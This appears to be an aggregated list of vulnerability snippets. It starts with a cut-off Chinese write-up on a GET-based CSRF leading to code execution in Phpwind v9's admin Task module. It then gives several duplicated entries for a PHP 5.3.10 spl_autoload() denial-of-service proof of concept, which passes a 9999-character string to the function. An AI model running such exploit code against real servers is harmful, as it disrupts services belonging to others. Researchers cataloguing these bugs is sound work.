Phpwind GET型CSRF任意代码执行 漏洞

来源链接：http://www.wooyun.org/bugs/wooyun-2016-01758150-tsina-1-93389-397232819ff9a47a7b7e80a40613cfe1 这个洞其实很有意思，最可惜的地方就是其触发位置在后台，否则它将是一个绝无仅有的好洞。 0x01 后台反序列化位置 首先纵览整个phpwindv9，反序列化的位置很多，但基本都是从数据库里取出的，很难完全控制序列化字符串。 最后，找到三处： 可恶的是，三处都在后台的Task模块下。Task模块是『任务中心』功能，只有能进入后台的用户才可以访问： 随便打开一个，...

Internet Bug Bounty: Null pointer deref (segfault) in spl_autoload via ob_start

https://bugs.php.net/bug.php?id=70290...

PHP 5.3.10 spl_autoload() Local Denial of Service

No description provided by source. ?php PHP 5.3.10 splautoload Local Denial of Service Tested on Windows 7 64bit, English, Apache, PHP 5.3.10 Date: 02/06/2012 Local Denial of Service Bug discovered by Pr0T3cT10n, [email protected] ISRAEL http://www.0x31337.net $buff = strrepeat"A",9999;...

PHP 5.3.10 spl_autoload() Denial Of Service

ISRAEL http://www.0x31337.net $buff = strrepeat"A",9999; splautoload$buff; ?...

PHP 5.3.10 spl_autoload() Local Denial of Service

Exploit for php platform in category dos / poc ISRAEL http://www.0x31337.net $buff = strrepeat"A",9999; splautoload$buff; ? 0day.today 2018-03-31...

PHP 5.3.10 - spl_autoload() Local Denial of Service

PHP 5.3.10 - splautoload Local Denial of Service ISRAEL http://www.0x31337.net $buff = strrepeat"A",9999; splautoload$buff; ?...

PHP 5.3.10 - 'spl_autoload()' Local Denial of Service

ISRAEL http://www.0x31337.net $buff = strrepeat"A",9999; splautoload$buff; ?...